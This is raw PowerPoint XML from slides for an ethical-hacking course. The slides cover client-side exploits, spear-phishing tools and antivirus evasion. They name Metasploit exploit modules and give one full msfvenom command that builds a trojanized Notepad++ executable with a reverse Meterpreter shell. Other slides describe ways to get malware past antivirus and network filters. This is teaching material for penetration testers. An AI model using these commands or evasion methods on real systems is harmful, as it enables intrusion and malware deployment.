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256" r:id="rId2"/>
    <p:sldId id="268" r:id="rId3"/>
    <p:sldId id="270" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="272" r:id="rId8"/>
    <p:sldId id="275" r:id="rId9"/>
    <p:sldId id="273" r:id="rId10"/>
    <p:sldId id="260" r:id="rId11"/>
    <p:sldId id="276" r:id="rId12"/>
    <p:sldId id="280" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="281" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="266" r:id="rId17"/>
    <p:sldId id="283" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="288" r:id="rId22"/>
    <p:sldId id="289" r:id="rId23"/>
    <p:sldId id="290" r:id="rId24"/>
    <p:sldId id="265" r:id="rId25"/>
    <p:sldId id="291" r:id="rId26"/>
    <p:sldId id="292" r:id="rId27"/>
    <p:sldId id="295" r:id="rId28"/>
    <p:sldId id="294" r:id="rId29"/>
    <p:sldId id="264" r:id="rId30"/>
    <p:sldId id="297" r:id="rId31"/>
    <p:sldId id="298" r:id="rId32"/>
    <p:sldId id="296" r:id="rId33"/>
    <p:sldId id="263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7" r:id="rId42"/>
    <p:sldId id="310" r:id="rId43"/>
    <p:sldId id="306" r:id="rId44"/>
    <p:sldId id="308" r:id="rId45"/>
    <p:sldId id="309" r:id="rId46"/>
    <p:sldId id="311" r:id="rId47"/>
    <p:sldId id="312" r:id="rId48"/>
    <p:sldId id="313" r:id="rId49"/>
    <p:sldId id="314" r:id="rId50"/>
    <p:sldId id="315" r:id="rId51"/>
    <p:sldId id="322" r:id="rId52"/>
    <p:sldId id="323" r:id="rId53"/>
    <p:sldId id="320" r:id="rId54"/>
    <p:sldId id="319" r:id="rId55"/>
    <p:sldId id="318" r:id="rId56"/>
    <p:sldId id="317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41" autoAdjust="0"/>
    <p:restoredTop sz="90709" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="-1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4D1BE-51B8-2944-AD4A-5500DFD7A47D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/28/15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D9BBD-9256-9646-9E53-AA35FB76F9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745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10/28/15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177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10/28/15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13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10/28/15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594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10/28/15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539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10/28/15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681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10/28/15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40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10/28/15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36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10/28/15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888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10/28/15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926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10/28/15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49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10/28/15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25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19829-3C23-A945-B2EC-6A645BCE48BA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/28/15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02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690"/>
            <a:ext cx="4541985" cy="2660647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CNIT 124: Advanced Ethical Hacking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688" y="4771318"/>
            <a:ext cx="6400800" cy="136064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 10: Client-Side Exploitation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gw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751" y="162691"/>
            <a:ext cx="29337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36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 smtClean="0"/>
              <a:t>Client-Side Attacks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98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Attacking Web browsers, document viewers, music players, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create malicious file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trick user into opening it on the target system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then the machine makes a connection back to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Such attacks are more important in penetration tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because more companies are finding and fixing network-listening vulnerabilities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167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Attacking Through NAT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Workstations and mobile devices typically lack a public IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They cannot be directly attacked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But they can still make outgoing connections to the attacker (reverse)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BUT it all relies on social engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target must open a file, or click a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 smtClean="0"/>
              <a:t>Browser Exploitation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79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9657" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious Web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8714"/>
            <a:ext cx="3969657" cy="4257449"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Get user to visit a malicious Web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hijack execution in the browser and execute a payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-10-27 at 2.30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857" y="542816"/>
            <a:ext cx="4535714" cy="600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56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Aurora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Chinese hackers used it against Google, Adobe, and Yahoo!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A zero-day IE vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After this attack, Google switched to Chrome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Metasploit module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>exploit/windows/browser/ms10_002_aurora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81475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 smtClean="0"/>
              <a:t>Running Scripts in a Meterpreter Session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810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IE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a malicious Web server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="p14-client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5705"/>
            <a:ext cx="7725229" cy="373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18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the Malicious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14-client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5" y="1498989"/>
            <a:ext cx="7130143" cy="507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29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Own the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14-client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9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451428" y="1600200"/>
            <a:ext cx="5823857" cy="482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57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Low-Hanging Fruit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weakest defenders have these sorts of problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerable services listening on network ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unchanged default passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Misconfigured web servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356743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Meterpreter Lives in a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Terminating this process kills the Meterpreter session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="p14-client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0" y="2849336"/>
            <a:ext cx="3632200" cy="1054100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="p14-client1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87"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="494950" y="4347256"/>
            <a:ext cx="8191850" cy="2202315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399301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Migrate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14-client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12243"/>
            <a:ext cx="8232186" cy="228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35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AutoRunScript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14-client1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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669143" y="1600200"/>
            <a:ext cx="5968999" cy="514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37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Explorer.exe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Draws the desktop and the Start button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Runs until the user logs out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="p14-client1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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472273" y="3447143"/>
            <a:ext cx="8214527" cy="3029857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878178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 smtClean="0"/>
              <a:t>PDF Exploits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899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Adobe Reader Vulns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as many as there used to be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Link Ch 10a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-10-28 at 11.11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6" y="2912025"/>
            <a:ext cx="5987143" cy="3722365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734054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Adobe PDF Embedded EXE Social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3857"/>
            <a:ext cx="8229600" cy="4112306"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not considered a coding error to be patched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A feature of Adobe Reader that can be abused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit/windows/fileformat/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>adobe_pdf_embedded_exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Does not work on Adobe Reader 8.12 on Windows Server 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Does not work in Adobe Reader DC on Win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274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Vulnerable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8857"/>
            <a:ext cx="8229600" cy="937306"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Link Ch 10b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-10-28 at 11.50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088086" cy="3376219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819606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10-28 at 11.37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43" y="1600200"/>
            <a:ext cx="5860142" cy="502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50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 smtClean="0"/>
              <a:t>Java Exploits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627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all security patches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Audit passwords and remove easily-guessed or –cracked ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control user roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Regular users don't have administrative rights on their workstations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software is installed and maintained by the security staff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9216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Java is very popular because the same code can be run in a Java Virtual Machine on any platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows, Mac, Linux, Android</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Therefore exploitation is also multiplatform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Must trick user into opening a malicious URL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7726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10-28 at 11.58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42" y="1600200"/>
            <a:ext cx="6966857" cy="498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413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Nothing Very Recent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10-28 at 11.54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4518"/>
            <a:ext cx="8229600" cy="46737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1627967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 smtClean="0"/>
              <a:t>browser_autopwn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117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All The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10-28 at 12.03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600199"/>
            <a:ext cx="8228521" cy="469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13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10-28 at 12.04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3" y="1600200"/>
            <a:ext cx="8236857" cy="416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12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IE 11 on Win 7: FAILS because I don't have Java installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firefox 41.0 on Win7 FAILS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chrome 46.0.2490.80 on Win 7 FAILS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299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 7 on Win Server 2008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10-28 at 12.14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71" y="1659988"/>
            <a:ext cx="7692571" cy="436082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033322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 7 on Win Server 2008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5-10-28 at 12.14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9941"/>
            <a:ext cx="7728857" cy="3942917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934444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 7 on Win Server 2008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5-10-28 at 12.15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72" y="2021665"/>
            <a:ext cx="7855857" cy="406821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934444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That don't require direct network access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target local software—not listening on a network port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bind shell won't work, because such systems are behind firewalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reverse connections may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328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 7 on Win Server 2008</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FAILS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10-28 at 12.14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71" y="1659988"/>
            <a:ext cx="7692571" cy="436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44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690"/>
            <a:ext cx="4541985" cy="2660647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CNIT 124: Advanced Ethical Hacking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688" y="4771318"/>
            <a:ext cx="6400800" cy="136064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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11: Social Engineering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gw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751" y="162691"/>
            <a:ext cx="29337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859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Spear-Phishing Attacks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187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Attack Options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Screen Shot 2015-10-28 at 12.24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7" y="1742163"/>
            <a:ext cx="7293429" cy="479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527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10-28 at 12.33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285" y="1077763"/>
            <a:ext cx="6168571" cy="538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78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Gmail Blocks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Default Metasploit payloads are blocked by virus scanners</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-10-28 at 12.34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49456"/>
            <a:ext cx="8229600" cy="257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078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 Attacks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927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Attack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10-28 at 12.37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23142"/>
            <a:ext cx="8229600" cy="376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83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Explanations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Metasploit Browser is like browser_autopwn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Credential Harvester makes fake login pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tabnapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> says "Please Wait" and when the user clicks on another tab, changes to a fake login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924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Broken in Kali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update option is broken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You can force an update (link Ch 11a)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But even then, Credential Harvester is broken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because it uses /var/www instead of /var/www/html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573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Bypassing Filters with Metasploit Payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client-Side Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Running Scripts in a Meterpreter Session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PDF Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browser_autopwn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9124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690"/>
            <a:ext cx="4541985" cy="2660647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CNIT 124: Advanced Ethical Hacking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688" y="4771318"/>
            <a:ext cx="6400800" cy="136064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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12: Bypassing Antivirus Applications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gw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751" y="162691"/>
            <a:ext cx="29337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583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Trojans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malware to existing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>executables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only works with files that don't check integrity with hash values or signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 LPORT=2345 -x /root/Desktop/notepad++.exe -k -f exe &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evilnotepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>++.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exe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4967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trojan works on Win 7, but many AV products catch it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-10-28 at 1.31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70" y="3071971"/>
            <a:ext cx="7725229" cy="316621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1977270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Metasploit includes encoding engines, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, but the AV vendors are on to them and they actually make the trojan more detectable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0048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Cross-Compiling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export the malware as C code and compile it, adding a random value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Still, almost as many AV vendors catch it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exporting malware as Python and then compiling it on Windows to an EXE worked well for me a couple of years ago</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Clumsy process, produces large EXE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8683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Encrypting with Hyperion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Hyperion encrypts the file with AES, and with a key drawn from a small portion of the possible keyspace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then deletes the key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When run, it brute-forces the key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This fooled Microsoft Security Essentials, but not many other AV engines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35086127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Veil-Evasion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62514" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Big, powerful program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Takes a while to install on Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Results are not impressive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="avast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1857828"/>
            <a:ext cx="47879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12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 smtClean="0"/>
              <a:t>Bypassing Filters with Metasploit Payloads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036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Filters may not allow an outgoing connection to port 4444 (Metasploit's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>reverse_tcp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But it may allow connections to ports 80 or 443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>reverse_tcp_allports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> payload will try all ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First it tries LPORT, then all other ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May cause target application to hang for a long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513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and HTTPS Payloads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Traffic follows HTTP and HTTPS specifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Packet-based, not stream-based like TCP payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interrupted sessions can recover and reconnect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4227315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Proxy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 and HTTPS payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use the Internet Explorer proxy settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May fail when running as SYSTEM because those proxy settings are not defined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>reverse_http_proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>payload allows the attacker to manually specify proxy settings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74580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985</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>151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CNIT 124: Advanced Ethical Hacking</vt:lpstr>
      <vt:lpstr>Low-Hanging Fruit</vt:lpstr>
      <vt:lpstr>Defenses</vt:lpstr>
      <vt:lpstr>Other Attacks</vt:lpstr>
      <vt:lpstr>Topics</vt:lpstr>
      <vt:lpstr>Bypassing Filters with Metasploit Payloads</vt:lpstr>
      <vt:lpstr>All Ports</vt:lpstr>
      <vt:lpstr>HTTP and HTTPS Payloads</vt:lpstr>
      <vt:lpstr>Proxy Servers</vt:lpstr>
      <vt:lpstr>Client-Side Attacks</vt:lpstr>
      <vt:lpstr>Local Attacks</vt:lpstr>
      <vt:lpstr>Attacking Through NAT</vt:lpstr>
      <vt:lpstr>Browser Exploitation</vt:lpstr>
      <vt:lpstr>Malicious Web Page</vt:lpstr>
      <vt:lpstr>Aurora Attack</vt:lpstr>
      <vt:lpstr>Running Scripts in a Meterpreter Session</vt:lpstr>
      <vt:lpstr>Normal IE Attack</vt:lpstr>
      <vt:lpstr>Open the Malicious Page</vt:lpstr>
      <vt:lpstr>Own the Target</vt:lpstr>
      <vt:lpstr>Meterpreter Lives in a Process</vt:lpstr>
      <vt:lpstr>Migrate Script</vt:lpstr>
      <vt:lpstr>AutoRunScript</vt:lpstr>
      <vt:lpstr>Explorer.exe</vt:lpstr>
      <vt:lpstr>PDF Exploits</vt:lpstr>
      <vt:lpstr>Adobe Reader Vulns</vt:lpstr>
      <vt:lpstr>Adobe PDF Embedded EXE Social Engineering</vt:lpstr>
      <vt:lpstr>Vulnerable Form</vt:lpstr>
      <vt:lpstr>Warning Message</vt:lpstr>
      <vt:lpstr>Java Exploits</vt:lpstr>
      <vt:lpstr>Multiplatform</vt:lpstr>
      <vt:lpstr>Warning Message</vt:lpstr>
      <vt:lpstr>Nothing Very Recent</vt:lpstr>
      <vt:lpstr>browser_autopwn</vt:lpstr>
      <vt:lpstr>Start All The Modules</vt:lpstr>
      <vt:lpstr>20 Modules</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>IE 7 on Win Server 2008</vt:lpstr>
